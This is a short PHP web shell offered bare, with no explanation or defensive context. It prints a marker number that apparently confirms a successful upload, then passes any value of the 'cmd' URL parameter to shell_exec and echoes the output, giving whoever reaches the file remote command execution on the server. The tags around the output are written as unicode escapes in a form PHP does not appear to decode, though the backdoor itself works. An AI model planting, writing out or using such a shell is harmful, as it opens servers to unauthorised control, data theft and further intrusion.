<?php
// PHP shell for verification and command execution
echo 708024;
if (isset($_GET['cmd'])) {
    echo "\u003c\u0070\u0072\u0065\u003e" . shell_exec($_GET['cmd']) . "\u003c\u002f\u0070\u0072\u0065\u003e";
}
?>